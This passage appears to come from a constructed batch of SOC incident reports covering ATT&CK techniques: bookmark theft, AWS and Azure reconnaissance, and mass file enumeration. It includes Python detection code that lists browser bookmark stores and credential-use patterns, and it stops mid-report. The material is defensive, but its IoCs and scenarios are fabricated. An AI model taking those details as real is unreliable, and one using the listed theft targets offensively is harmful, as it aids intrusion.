Alert ID: MD-BOOKMARK-DISCOVERY-1217-7842
Alert Time: 2024-02-23 16:30:45 EST
Severity: MEDIUM (68/100)
Source: Microsoft Defender for Endpoint
Rule: “Browser Bookmark Access – Potential Reconnaissance”
MITRE ATT&CK: T1217 – Browser Bookmark Discovery
Alert Details:
Detection: Process accessing browser bookmark files
Host: MKT-WS-112 (Marketing Workstation)
User: sjones (Sarah Jones, Marketing Manager)
Time: 16:25 EST
File Access Events:
16:25:10 – Process accessed: C:\Users\sjones\AppData\Local\Google\Chrome\User Data\Default\Bookmarks
16:25:15 – Process accessed: C:\Users\sjones\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak
16:25:20 – Process accessed: C:\Users\sjones\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\places.sqlite
16:25:25 – Process accessed: C:\Users\sjones\AppData\Local\Microsoft\Edge\User Data\Default\Bookmarks
Process Details:
Process: C:\Temp\bookmark_viewer.exe (PID: 4789)
SHA256: a1b2c3d4… (truncated in this record)
Parent: explorer.exe
User: sjones
Bookmark Categories Found:
“Corporate Banking” – 3 bookmarks
“VPN Access” – 2 bookmarks
“Internal Portals” – 5 bookmarks
“Cloud Services” – 8 bookmarks
“Vendor Portals” – 12 bookmarks
Total bookmarks: 147
Detection Logic:
Process accessing browser bookmark files (unusual)
Bookmarks contain sensitive/internal URLs
Process from Temp folder (suspicious)
Pattern matches reconnaissance for targeted attacks
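Detection logic like the above can be run directly over file-access telemetry. The following is an added example (it is not Defender's rule and not code from this page): it matches each access event against the bookmark-store paths of Chrome, Edge and Firefox, treating the path as a pattern rather than a literal because Firefox's profile directory has a random prefix, allowlists the three browser images by full path so a renamed copy in C:\Temp does not pass, and groups hits per process so one tool reading four stores yields one finding. The event field names, the allowlist, the suspicious-directory list and the sample events are assumptions constructed for the example.

```python
from __future__ import annotations

import fnmatch
import ntpath
from dataclasses import dataclass

# Bookmark stores of the three browsers named in the alert. "*" stands in for
# the user directory and the per-profile directory (Firefox: "<random>.default").
BOOKMARK_STORES = [
    r"*\AppData\Local\Google\Chrome\User Data\*\Bookmarks",
    r"*\AppData\Local\Google\Chrome\User Data\*\Bookmarks.bak",
    r"*\AppData\Local\Microsoft\Edge\User Data\*\Bookmarks",
    r"*\AppData\Local\Microsoft\Edge\User Data\*\Bookmarks.bak",
    r"*\AppData\Roaming\Mozilla\Firefox\Profiles\*\places.sqlite",
]

# Assumed allowlist: browsers may read their own stores. Matched on the full
# image path, so a chrome.exe dropped in C:\Temp is still flagged.
BROWSER_IMAGES = {
    r"c:\program files\google\chrome\application\chrome.exe",
    r"c:\program files (x86)\microsoft\edge\application\msedge.exe",
    r"c:\program files\mozilla firefox\firefox.exe",
}

# Directories a legitimate bookmark reader is not expected to run from (assumed).
SUSPICIOUS_DIRS = ("c:\\temp\\", "c:\\users\\public\\", "\\appdata\\local\\temp\\")


@dataclass
class FileEvent:
    time: str
    user: str
    process_path: str
    file_path: str


def is_bookmark_store(path: str) -> bool:
    # fnmatch's "*" spans backslashes, which the profile wildcard needs;
    # compare lower-cased because NTFS paths are case-insensitive.
    p = path.lower()
    return any(fnmatch.fnmatchcase(p, pat.lower()) for pat in BOOKMARK_STORES)


def classify(event: FileEvent) -> list[str]:
    """Return the reasons an event is suspicious; an empty list means benign."""
    if not is_bookmark_store(event.file_path):
        return []
    proc = event.process_path.lower()
    if proc in BROWSER_IMAGES:
        return []
    reasons = ["non-browser process read a browser bookmark store"]
    if any(d in proc for d in SUSPICIOUS_DIRS):
        reasons.append("process image in a temp/public directory")
    if ntpath.basename(proc) in {ntpath.basename(b) for b in BROWSER_IMAGES}:
        reasons.append("browser image name from a non-standard path (masquerade)")
    return reasons


def find_suspicious(events: list[FileEvent]) -> dict:
    """Group hits by process, so one tool reading several stores is one finding."""
    findings: dict = {}
    for ev in events:
        reasons = classify(ev)
        if reasons:
            f = findings.setdefault(ev.process_path,
                                    {"user": ev.user, "files": [], "reasons": set()})
            f["files"].append(ev.file_path)
            f["reasons"].update(reasons)
    return findings


# Constructed sample events shaped like the alert's file-access list.
_U = r"C:\Users\sjones\AppData"
SAMPLE_EVENTS = [
    FileEvent("16:25:10", "sjones", r"C:\Temp\bookmark_viewer.exe", _U + r"\Local\Google\Chrome\User Data\Default\Bookmarks"),
    FileEvent("16:25:15", "sjones", r"C:\Temp\bookmark_viewer.exe", _U + r"\Local\Google\Chrome\User Data\Default\Bookmarks.bak"),
    FileEvent("16:25:20", "sjones", r"C:\Temp\bookmark_viewer.exe", _U + r"\Roaming\Mozilla\Firefox\Profiles\k3z9q1ab.default\places.sqlite"),
    FileEvent("16:25:25", "sjones", r"C:\Temp\bookmark_viewer.exe", _U + r"\Local\Microsoft\Edge\User Data\Default\Bookmarks"),
    FileEvent("16:25:30", "sjones", r"C:\Temp\bookmark_viewer.exe", r"C:\Temp\bookmarks_export.html"),
    # benign: the real browser touching its own store
    FileEvent("16:26:00", "sjones", r"C:\Program Files\Google\Chrome\Application\chrome.exe", _U + r"\Local\Google\Chrome\User Data\Default\Bookmarks"),
    # masquerade: same image name, wrong location
    FileEvent("16:27:00", "sjones", r"C:\Temp\chrome.exe", _U + r"\Local\Google\Chrome\User Data\Default\Bookmarks"),
]

if __name__ == "__main__":
    for proc, f in find_suspicious(SAMPLE_EVENTS).items():
        print(proc, f["user"], len(f["files"]), sorted(f["reasons"]))
```

The allowlist is deliberately keyed on the full image path: a detection that trusts any process named chrome.exe is defeated by the masquerade case in the sample, which the example reports with its own reason string.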
SOC Investigation Process
| Step | Action | Tools Used | Findings |
| --- | --- | --- | --- |
| 1. Alert Validation | Verify Defender alert | Microsoft 365 Defender | Confirmed bookmark access |
| 2. Process Analysis | Analyze bookmark_viewer.exe | Defender Sandbox | Tool extracts and categorizes bookmarks |
| 3. Immediate Action | Terminate process | Defender | Process killed |
| 4. File Deletion | Delete bookmark_viewer.exe | Defender | File removed |
| 5. User Interview | Contact sjones | Teams, Phone | User downloaded “bookmark manager” tool |
| 6. Data Check | Verify exfiltration | Firewall Logs, DLP | No exfiltration detected |
Jira Incident Report
Ticket: SOC-2024-119
Summary: T1217 – Browser Bookmark Discovery Tool Executed
Status: RESOLVED
Resolution: MALICIOUS – Tool Removed
Priority: P3 – LOW
Labels: T1217, bookmark-discovery, reconnaissance, defender, marketing
Components: Endpoint-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Browser Bookmark Access – Potential Reconnaissance”.
Host: MKT-WS-112 (Marketing Department, user sjones).
Process: C:\Temp\bookmark_viewer.exe.
Time: 2024-02-23 16:30 EST.
Technique: MITRE ATT&CK T1217 – Browser Bookmark Discovery.
2. Technical Analysis:
Attack Chain:
16:15 – User searches for “bookmark manager tool”
16:16 – Downloads bookmark_viewer.exe from freeware site
16:17 – Executes tool
16:18-16:25 – Tool accesses Chrome, Firefox, Edge bookmarks
16:25 – Defender detects
16:26 – SOC investigates
Tool Analysis:
Name: bookmark_viewer.exe (presented as a bookmark manager; the outbound POST below shows it is a collection tool)
SHA256: a1b2c3d4…
Capabilities:
Reads bookmarks from all major browsers
Categorizes bookmarks by folder
Exports to HTML/CSV
Attempts to phone home (blocked)
Bookmarks Discovered:
Internal Portals: Confluence, Jira, HR system, IT helpdesk, VPN
Cloud Services: Office 365, AWS, Azure, GCP, Salesforce
Vendor Portals: 12 different vendor login pages
Banking: Corporate banking, expense reporting
Total: 147 bookmarks with corporate/login information
Exfiltration Attempt:
Tool attempted to POST bookmark data to 185.143.221[.]89:8080
Connection blocked by firewall
No data exfiltrated
3. Investigation Findings:
Timeline:
16:15 – Tool downloaded
16:17 – Tool executed
16:18-16:25 – Bookmarks accessed
16:25 – Defender alert
16:26 – Process terminated
16:27 – File deleted
Indicators of Compromise (IoCs):
Files:
– C:\Temp\bookmark_viewer.exe (SHA256: a1b2c3d4…)
– C:\Temp\bookmarks_export.html (partial)
Network:
– C2 attempt: 185.143.221[.]89:8080 (blocked)
4. Containment Actions:
Immediate Actions:
Terminated bookmark_viewer.exe.
Deleted executable and export file.
Blocked C2 IP at firewall.
Data Review:
Verified no exfiltration occurred.
Bookmarks unchanged.
User Remediation:
User counseled on downloading freeware.
Advised to use corporate-approved tools only.
5. Root Cause Analysis:
Primary Cause: User downloaded untrusted bookmark manager tool.
Contributing Factors:
No application control blocking unknown executables.
User unaware of risks of freeware tools.
6. Business Impact:
Operational Impact: None.
Data Exposure: Bookmark data accessed locally but not exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Malicious tool removed.
User educated.
C2 blocked.
Technical Controls Enhanced:
Created alert for bookmark file access by non-browser processes.
Enhanced application control policies.
Added the C2 destination and the bookmark-export-then-POST pattern to network monitoring.
8. Conclusion:
A user downloaded a bookmark manager tool that accessed browser bookmarks containing internal and sensitive URLs. The tool attempted to exfiltrate the data, but was blocked. Defender detected the bookmark access and terminated the process.
Closure Rationale: Tool removed; data contained; user educated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-23 17:30 EST
80. T1580 – Cloud Infrastructure Discovery (AWS GuardDuty Detection)
AWS GuardDuty Alert Details
Alert ID: GUARDDUTY-CLOUD-DISCOVERY-1580-7842
Alert Time: 2024-02-23 10:30:22 EST
Severity: HIGH (85/100)
Source: AWS GuardDuty
Rule: “Unauthorized API Calls – Cloud Infrastructure Discovery”
MITRE ATT&CK: T1580 – Cloud Infrastructure Discovery
Alert Details:
Detection: Multiple Describe/List API calls from unusual source
AWS Account: 123456789012 (Production)
IAM User: svc_ci_cd (CI/CD Service Account)
Source IP: 185.143.221[.]89 (Bulgaria)
Time: 10:15-10:30 EST
API Calls:
10:15:22 – ec2:DescribeInstances (list all EC2 instances)
10:15:45 – ec2:DescribeSecurityGroups (list all security groups)
10:16:12 – ec2:DescribeVpcs (list all VPCs)
10:16:38 – ec2:DescribeSubnets (list all subnets)
10:17:05 – ec2:DescribeRouteTables (list all route tables)
10:17:33 – ec2:DescribeInternetGateways (list IGWs)
10:18:01 – s3:ListBuckets (list all S3 buckets)
10:18:28 – s3:GetBucketLocation (for each bucket)
10:19:15 – rds:DescribeDBInstances (list all RDS instances)
10:19:45 – lambda:ListFunctions (list all Lambda functions)
10:20:12 – iam:ListUsers (list all IAM users)
10:20:38 – iam:ListRoles (list all IAM roles)
… (total 87 API calls)
Detection Logic:
Source IP outside expected region (Bulgaria, not US)
User svc_ci_cd normally only used from US
API calls are discovery-focused (Describe/List)
Volume of calls (87 in 15 minutes) exceeds normal
No write/modify operations (consistent with discovery)
Additional Context:
svc_ci_cd has read-only permissions (by design)
Credentials may be compromised
Discovery phase before potential attack
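The three detection conditions above (unfamiliar source IP, Describe/List-only calls, volume over a window) and the first containment step can be expressed over raw CloudTrail records. The following is an added example, not GuardDuty's logic and not code from this page: it groups records by (userName, sourceIPAddress), skips principals seen from a baseline IP, finds the densest 15-minute window of inventory calls, and lists any write or data-plane read calls separately, because a "read-only" policy still permits s3:GetObject and the analyst has to check the logs rather than infer from the policy. It also emits the inline deny policy on aws:TokenIssueTime that invalidates STS sessions obtained before the key rotation, since rotating an access key alone does not end sessions already issued from it. The baseline table, thresholds, sample records and rotation time are assumptions constructed for the example.

```python
from __future__ import annotations

import json
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

# Assumed baseline: source IPs each principal is normally seen from
# (in practice built from previous weeks of CloudTrail).
BASELINE_IPS = {"svc_ci_cd": {"203.0.113.10", "203.0.113.11"}}
WINDOW = timedelta(minutes=15)
BURST_THRESHOLD = 20  # inventory calls in one window before we call it discovery

# "Read-only" is not "no data": these read object/secret contents and are
# reported separately from control-plane Describe/List/Get inventory calls.
DATA_PLANE_READS = {"GetObject", "GetSecretValue", "GetParameter", "GetParameters"}


def classify_call(event_name: str) -> str:
    if event_name in DATA_PLANE_READS:
        return "data_read"
    if event_name.startswith(("Describe", "List", "Get")):
        return "discovery"
    return "write"


def _ts(rec: dict) -> datetime:
    return datetime.strptime(rec["eventTime"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def find_discovery_bursts(records: list[dict]) -> dict:
    """Findings keyed by (userName, sourceIPAddress) for non-baseline IPs whose
    densest 15-minute window of inventory calls reaches BURST_THRESHOLD."""
    by_actor: dict = defaultdict(list)
    for rec in records:
        user = rec["userIdentity"].get("userName", "<unknown>")
        by_actor[(user, rec["sourceIPAddress"])].append(rec)
    findings = {}
    for (user, ip), recs in by_actor.items():
        if ip in BASELINE_IPS.get(user, set()):
            continue
        kinds = {k: [r for r in recs if classify_call(r["eventName"]) == k]
                 for k in ("discovery", "write", "data_read")}
        reads = sorted(kinds["discovery"], key=_ts)
        best, start = 0, 0                      # sliding window over sorted reads
        for end in range(len(reads)):
            while _ts(reads[end]) - _ts(reads[start]) > WINDOW:
                start += 1
            best = max(best, end - start + 1)
        if best >= BURST_THRESHOLD:
            findings[(user, ip)] = {
                "calls_in_window": best,
                "services": Counter(r["eventSource"].split(".")[0] for r in reads),
                "write_calls": [r["eventName"] for r in kinds["write"]],
                "data_reads": [r["eventName"] for r in kinds["data_read"]],
            }
    return findings


def session_revocation_policy(rotated_at: datetime) -> dict:
    """Inline IAM policy denying any temporary credential issued before
    rotation (aws:TokenIssueTime is a documented global condition key).
    Long-term access keys carry no issue time, so the condition does not
    match them and the freshly rotated key keeps working."""
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Deny", "Action": "*", "Resource": "*",
            "Condition": {"DateLessThan": {
                "aws:TokenIssueTime": rotated_at.strftime("%Y-%m-%dT%H:%M:%SZ")}},
        }],
    }


def _make_records() -> list[dict]:
    """Constructed sample: 24 inventory calls from 185.143.221.89 within 11.5
    minutes, plus a normal pipeline run (with one write) from a baseline IP."""
    base = datetime(2024, 2, 23, 15, 15, tzinfo=timezone.utc)  # 10:15 EST
    names = ["DescribeInstances", "DescribeSecurityGroups", "DescribeVpcs", "ListBuckets",
             "DescribeDBInstances", "ListFunctions", "ListUsers", "ListRoles"]
    sources = ["ec2", "ec2", "ec2", "s3", "rds", "lambda", "iam", "iam"]

    def rec(t, name, src, ip):
        return {"eventTime": t.strftime("%Y-%m-%dT%H:%M:%SZ"), "eventName": name,
                "eventSource": f"{src}.amazonaws.com", "sourceIPAddress": ip,
                "userIdentity": {"type": "IAMUser", "userName": "svc_ci_cd"}}

    recs = [rec(base + timedelta(seconds=30 * i), names[i % 8], sources[i % 8], "185.143.221.89")
            for i in range(24)]
    recs += [rec(base + timedelta(minutes=i), "PutObject" if i == 4 else "ListBuckets", "s3", "203.0.113.10")
             for i in range(5)]
    return recs


SAMPLE_RECORDS = _make_records()
ROTATED_AT = datetime(2024, 2, 23, 15, 35, tzinfo=timezone.utc)  # 10:35 EST, assumed

if __name__ == "__main__":
    for actor, f in find_discovery_bursts(SAMPLE_RECORDS).items():
        print(actor, f["calls_in_window"], dict(f["services"]), f["write_calls"], f["data_reads"])
    print(json.dumps(session_revocation_policy(ROTATED_AT), indent=2))
```

Attach the generated policy to the IAM user (put-user-policy) immediately after rotating the keys, then remove it once the window has passed; note that s3:GetObject only appears in CloudTrail if S3 data events are enabled, so an empty data_reads list is only meaningful when they are.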
SOC Investigation Process
| Step | Action | Tools Used | Findings |
| --- | --- | --- | --- |
| 1. Alert Validation | Verify GuardDuty alert | AWS GuardDuty Console | Confirmed unauthorized discovery API calls |
| 2. Immediate Action | Rotate access keys | AWS IAM | Access keys for svc_ci_cd rotated |
| 3. Session Invalidation | Invalidate temporary credentials already issued from the old keys | AWS IAM | Credentials revoked |
| 4. IP Blocking | Block attacker IP | AWS WAF, Security Groups | IP 185.143.221[.]89 blocked |
| 5. Impact Assessment | Determine what was discovered | CloudTrail Logs | Attacker enumerated all resources |
| 6. Threat Hunting | Check for other unauthorized access | GuardDuty, CloudTrail | No other suspicious activity |
Jira Incident Report
Ticket: SOC-2024-120
Summary: T1580 – Cloud Infrastructure Discovery via Compromised CI/CD Credentials
Status: RESOLVED
Resolution: MALICIOUS – Credentials Rotated
Priority: P2 – MEDIUM
Labels: T1580, cloud-discovery, aws, guardduty, compromised-credentials, ci-cd
Components: Cloud-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: AWS GuardDuty.
Alert: “Unauthorized API Calls – Cloud Infrastructure Discovery”.
AWS Account: 123456789012 (Production).
IAM User: svc_ci_cd (CI/CD service account).
Source IP: 185.143.221[.]89 (Bulgaria).
Time: 2024-02-23 10:30 EST.
Technique: MITRE ATT&CK T1580 – Cloud Infrastructure Discovery.
2. Technical Analysis:
Attack Chain:
09:30 – CI/CD credentials compromised (source unknown at the time; later traced to a public GitHub repository, see section 4)
09:45 – Attacker tests credentials from Bulgaria IP
10:15-10:30 – Attacker performs comprehensive discovery
10:30 – GuardDuty detects anomalous pattern
Discovery Performed:
EC2: 47 instances across 3 regions
Security Groups: 84 security groups with rules
VPCs: 12 VPCs with subnets, route tables
S3: 156 buckets with locations
RDS: 23 database instances
Lambda: 78 functions
IAM: 342 users, 156 roles
Total: Full inventory of cloud infrastructure
Credentials Used:
User: svc_ci_cd (CI/CD service account)
Permissions: ReadOnly (by design)
Access Keys: AKIAxxxxxxxxxxxxxxxx (now rotated)
Attacker Intent:
Complete infrastructure mapping
Identifying high-value targets (databases, buckets with sensitive data)
Reconnaissance for future attack
3. Investigation Findings:
Timeline:
09:30 – Credentials compromised
10:15-10:30 – Discovery performed
10:30 – GuardDuty alert
10:32 – SOC investigates
10:35 – Access keys rotated
10:36 – Attacker IP blocked
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
AWS:
– IAM User: svc_ci_cd
– Access Keys: AKIAxxxxxxxxxxxxxxxx (rotated)
API Calls:
– ec2:Describe*, s3:List*, rds:Describe*, iam:List*, lambda:List*
4. Containment Actions:
Immediate Actions:
Rotated access keys for svc_ci_cd.
Revoked any active sessions.
Blocked attacker IP at AWS WAF and security groups.
Impact Assessment:
No write/modify operations performed.
No object or secret data read: CloudTrail shows only Describe/List control-plane calls and no s3:GetObject or comparable data-plane reads (read-only permissions alone would not have prevented such reads, so this was confirmed from the logs rather than inferred from the policy).
No resources created/modified/deleted.
Credential Leak Investigation:
Found CI/CD credentials in public GitHub repo (developer mistake).
Repo made private; credentials removed.
Developer counseled.
5. Root Cause Analysis:
Primary Cause: CI/CD credentials leaked in public GitHub repository.
Contributing Factors:
No secret scanning in place.
Developer unaware of credential exposure.
Service account had broad read-only access.
6. Business Impact:
Operational Impact: None.
Security Impact: Full infrastructure inventory exposed to attacker.
Reputational Impact: Internal only.
7. Remediation & Prevention:
Completed Actions:
Credentials rotated.
Attacker blocked.
GitHub repo secured.
Technical Controls Enhanced:
Implemented secret scanning (GitHub Advanced Security).
Enforced MFA for all human IAM users (not feasible for the unattended CI/CD access keys, which were instead constrained with IAM policy guardrails).
Restricted service account permissions to least privilege.
Deployed GuardDuty with automated response.
8. Conclusion:
An attacker discovered CI/CD credentials in a public GitHub repository and used them to perform comprehensive discovery of our AWS infrastructure. GuardDuty detected the anomalous API calls from an unusual location. Credentials were rotated before any write operations could occur.
Closure Rationale: Credentials rotated; attacker blocked; secret scanning implemented.
Analyst: [Walter White], SOC Analyst Date: 2024-02-23 11:30 EST
End of Batch 16
Batch 17: Discovery & Cloud Reconnaissance Incident Reports
81. T1538 – Cloud Service Dashboard Discovery (Azure AD Detection)
Azure AD Alert Details
Alert ID: AAD-CLOUD-DASHBOARD-1538-7842
Alert Time: 2024-02-24 09:30:15 EST
Severity: HIGH (85/100)
Source: Azure AD Identity Protection + Cloud App Security
Rule: “Unusual Azure Portal Access – Privileged Account Reconnaissance”
MITRE ATT&CK: T1538 – Cloud Service Dashboard Discovery
Alert Details:
Detection: Privileged account accessing multiple Azure management areas from unusual location
User: jwilson@company.com (Global Administrator)
Source IP: 185.143.221[.]89 (Bulgaria)
Time: 09:15-09:30 EST
Azure Portal Activity:
09:15:22 – Login to Azure Portal (successful)
09:15:45 – Navigated to “Subscriptions” blade (viewed all subscriptions)
09:16:12 – Navigated to “Resource Groups” (listed all resource groups)
09:16:38 – Navigated to “Virtual Machines” (viewed all VMs)
09:17:05 – Navigated to “SQL Databases” (viewed all databases)
09:17:33 – Navigated to “Storage Accounts” (listed all storage)
09:18:01 – Navigated to “Key Vaults” (viewed vault list)
09:18:28 – Navigated to “Azure AD Users” (exported user list)
09:19:15 – Navigated to “Azure AD Roles and Administrators”
09:19:45 – Navigated to “Enterprise Applications”
09:20:12 – Navigated to “Conditional Access Policies”
09:20:38 – Navigated to “Activity Log” (viewed recent changes)
09:21:00 – Signed out
Detection Logic:
User jwilson is Global Admin (highly privileged)
Normal access location: New York, USA
Current location: Bulgaria (impossible travel)
Access pattern: Systematic review of all Azure areas (reconnaissance)
No configuration changes made (view-only)
Pattern matches adversary discovery phase
Additional Context:
jwilson is a cloud architect
Account MFA: Enabled; the sign-in log shows the MFA requirement satisfied by a claim already present in the token, not by a fresh push
User reported receiving a push at 09:15 and did NOT approve it
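The combination that makes this sign-in a token-theft case rather than a simple bad-location alert can be checked mechanically from the sign-in log export. The following is an added example, not Identity Protection's own logic and not code from this page: for each sign-in it checks whether the account holds a privileged role, whether the country is outside the user's baseline, whether the same user signed in from a different country too recently to have travelled, and whether the MFA step was satisfied by a claim carried in an existing token rather than a challenge the user completed. The record fields are a subset of the sign-in log schema, the role set, baseline and travel threshold are assumptions, and the two authenticationStepResultDetail strings are treated as assumptions about the export format.

```python
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta

PRIVILEGED_ROLES = {"Global Administrator", "Privileged Role Administrator"}
BASELINE_COUNTRY = {"jwilson@company.com": {"US"}}   # assumed per-user baseline
TRAVEL_MIN = timedelta(hours=4)  # two countries closer in time than this: impossible travel

# authenticationDetails[].authenticationStepResultDetail strings as they appear
# in sign-in log exports (assumed literals; adjust to what your tenant emits).
MFA_BY_CLAIM = "MFA requirement satisfied by claim in the token"
MFA_FRESH = "MFA completed in Azure AD"


@dataclass
class SignIn:
    time: datetime
    user: str
    roles: frozenset
    country: str
    ip: str
    auth_details: tuple
    success: bool = True


def indicators(cur: SignIn, prev: SignIn | None = None) -> list[str]:
    """Reasons to escalate this sign-in; an empty list means nothing unusual."""
    if not cur.success:
        return []
    reasons = []
    priv = cur.roles & PRIVILEGED_ROLES
    off_baseline = cur.country not in BASELINE_COUNTRY.get(cur.user, set())
    if priv and off_baseline:
        reasons.append(f"privileged account ({', '.join(sorted(priv))}) signed in from non-baseline country {cur.country}")
    if prev is not None and prev.country != cur.country and cur.time - prev.time < TRAVEL_MIN:
        minutes = int((cur.time - prev.time).total_seconds() // 60)
        reasons.append(f"impossible travel: {prev.country} -> {cur.country} in {minutes} min")
    if off_baseline and MFA_BY_CLAIM in cur.auth_details and MFA_FRESH not in cur.auth_details:
        # The user completed no challenge for this session: the MFA claim came
        # with a token minted earlier, which is what a replayed token looks like.
        reasons.append("MFA satisfied by an existing token claim, no fresh challenge (token replay)")
    return reasons


def triage(signins: list[SignIn]) -> dict:
    """Walk sign-ins in time order, comparing each to the same user's previous one."""
    out, last = {}, {}
    for s in sorted(signins, key=lambda x: x.time):
        reasons = indicators(s, last.get(s.user))
        if reasons:
            out[(s.user, s.ip)] = reasons
        last[s.user] = s
    return out


# Constructed sample: jwilson's legitimate morning sign-in from New York, the
# Bulgarian portal session from the alert, and an unrelated ordinary user.
GA = frozenset({"Global Administrator"})
SAMPLE_SIGNINS = [
    SignIn(datetime(2024, 2, 24, 8, 40), "jwilson@company.com", GA, "US", "198.51.100.7", (MFA_FRESH,)),
    SignIn(datetime(2024, 2, 24, 9, 15), "jwilson@company.com", GA, "BG", "185.143.221.89", (MFA_BY_CLAIM,)),
    SignIn(datetime(2024, 2, 24, 9, 20), "sjones@company.com", frozenset(), "US", "198.51.100.9", (MFA_FRESH,)),
]

if __name__ == "__main__":
    for key, reasons in triage(SAMPLE_SIGNINS).items():
        print(key, *reasons, sep="\n  ")
```

The third indicator is the one that separates "user approved a push they should not have" from "the session was replayed": a declined push plus an MFA-satisfied-by-claim sign-in means revoking refresh tokens and sessions, not just resetting the password.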
SOC Investigation Process
| Step | Action | Tools Used | Findings |
| --- | --- | --- | --- |
| 1. Alert Validation | Verify Azure AD alert | Azure AD Identity Protection | Confirmed suspicious Azure portal access |
| 2. MFA Investigation | Check how MFA was satisfied | Azure AD Sign-in Logs | MFA satisfied by a claim already in the token, not by a fresh push (consistent with token theft) |
| 3. Immediate Action | Disable account | Azure AD, Active Directory | jwilson account disabled |
| 4. Session Termination | Revoke all sessions | Azure AD PowerShell | All sessions terminated |
| 5. Token Revocation | Revoke refresh tokens | Azure AD | All tokens invalidated |
| 6. Password Reset | Reset user password | Azure AD | Password reset; MFA re-enrolled |
Jira Incident Report
Ticket: SOC-2024-121
Summary: T1538 – Azure Portal Reconnaissance by Compromised Global Admin
Status: RESOLVED
Resolution: MALICIOUS – Account Secured
Priority: P1 – CRITICAL
Labels: T1538, cloud-discovery, azure-portal, azure-ad, compromised-admin
Components: Cloud-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Azure AD Identity Protection + Cloud App Security.
Alert: “Unusual Azure Portal Access – Privileged Account Reconnaissance”.
User: jwilson@company.com (Global Administrator).
Source IP: 185.143.221[.]89 (Bulgaria).
Time: 2024-02-24 09:30 EST.
Technique: MITRE ATT&CK T1538 – Cloud Service Dashboard Discovery.
2. Technical Analysis:
Attack Chain:
09:00 – Attacker obtains jwilson’s credentials (phishing)
09:15 – Attacker logs into Azure Portal from Bulgaria
09:15 – MFA push sent to user’s phone
09:15 – User did NOT approve (investigation ongoing: token theft possible)
09:15-09:21 – Attacker accesses Azure Portal (MFA somehow bypassed)
09:21 – Attacker signs out
09:30 – Azure AD detects anomaly
MFA Bypass Theory:
Session token theft from earlier legitimate session
Attacker used stolen token to access portal without MFA
User reported MFA request but did not approve
Token theft most likely vector
Resources Discovered:
Subscriptions: 3 production subscriptions identified
Resource Groups: 47 groups across subscriptions
Virtual Machines: 86 VMs (including 12 domain controllers)
SQL Databases: 23 databases (including customer data)
Storage Accounts: 34 accounts (including backups)
Key Vaults: 8 vaults (secrets/certificates)
Azure AD Users: 3,247 users exported
Admin Roles: 12 Global Admins identified
Conditional Access: Full policy visibility
Attacker Intent:
Complete Azure infrastructure mapping
Identifying high-value targets (Key Vaults, SQL, Domain Controllers)
Reconnaissance for ransomware or data theft
3. Investigation Findings:
Timeline:
09:00 – Credentials compromised
09:15-09:21 – Attacker reconnaissance
09:21 – Attacker exits
09:30 – Alert triggers
09:32 – SOC investigates
09:35 – Account disabled
09:36 – Sessions terminated
09:37 – Tokens revoked
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
Azure:
– User: jwilson@company.com
– Sign-in log ID: 7842-1234-5678-9012 (anomalous)
MFA:
– Push request at 09:15 (user declined)
4. Containment Actions:
Immediate Actions:
Disabled jwilson account.
Revoked all active sessions.
Revoked all refresh tokens.
Reset user password.
Re-enrolled MFA.
Azure-Wide Actions:
Reviewed all admin activity (no changes made).
Rotated any exposed secrets (precautionary).
Audited Conditional Access policies.
User Remediation:
jwilson briefed on token theft risks.
New laptop provisioned (potential compromise).
5. Root Cause Analysis:
Primary Cause: Credential compromise (phishing) combined with token theft.
Contributing Factors:
Session tokens not bound to device/location.
Admin account had excessive privileges.
No anomaly detection for token replay.
6. Business Impact:
Operational Impact: Global Admin offline for 2 hours.
Security Impact: Full Azure infrastructure inventory exposed.
Data Exposure: User list exported; no data accessed.
7. Remediation & Prevention:
Completed Actions:
Account secured.
Tokens revoked.
Sessions terminated.
Technical Controls Enhanced:
Enforced token protection (conditional access token binding).
Reduced Global Admin count (JIT access only).
Implemented Privileged Identity Management (PIM) for admins.
Enhanced Azure AD Identity Protection alerts.
8. Conclusion:
An attacker compromised a Global Admin account and performed comprehensive reconnaissance of our Azure infrastructure via the portal. Azure AD detected the anomalous access pattern and triggered an alert. The account was secured before any changes could be made.
Closure Rationale: Account secured; tokens revoked; Azure inventory exposed but unchanged.
Analyst: [Walter White], SOC Analyst Date: 2024-02-24 10:30 EST
82. T1083 – File and Directory Discovery (Varonis Detection)
Varonis Alert Details
Alert ID: VARONIS-FILE-DISCOVERY-1083-7842
Alert Time: 2024-02-24 14:15:33 EST
Severity: HIGH (82/100)
Source: Varonis Data Security Platform
Rule: “Mass File Enumeration – Potential Data Harvesting”
MITRE ATT&CK: T1083 – File and Directory Discovery
Alert Details:
Detection: User accessing unusually high number of files/folders across multiple shares
User: bturner@company.com (Brian Turner, Finance)
Source Host: FIN-WS-078
Time: 14:00-14:15 EST
File Access Events:
14:00:15 – Accessed \\filesrv\finance\ (folder listing) – 1,247 files
14:01:22 – Accessed \\filesrv\finance\Q1_Reports\ – 342 files
14:02:45 – Accessed \\filesrv\finance\Q2_Reports\ – 356 files
14:04:12 – Accessed \\filesrv\finance\Q3_Reports\ – 351 files
14:05:38 – Accessed \\filesrv\finance\Q4_Reports\ – 348 files
14:07:05 – Accessed \\filesrv\hr\payroll\ (unusual for this user) – 234 files
14:08:33 – Accessed \\filesrv\executive\board_meetings\ – 87 files
14:10:12 – Accessed \\filesrv\it\passwords\ (highly sensitive) – 12 files
14:12:45 – Accessed \\filesrv\r&d\projects\ – 567 files
14:14:30 – Accessed \\filesrv\legal\contracts\ – 189 files
Total Files Accessed: 3,733 files in 15 minutes (normal is 50-100 per day)
File Types of Interest:
.xlsx (Excel financials) – 847 files
.pdf (reports, contracts) – 1,234 files
.docx (documents) – 892 files
.txt (notes, passwords) – 47 files
.kdbx (KeePass database) – 3 files (CRITICAL)
Detection Logic:
3,733 files accessed in 15 minutes (37x normal)
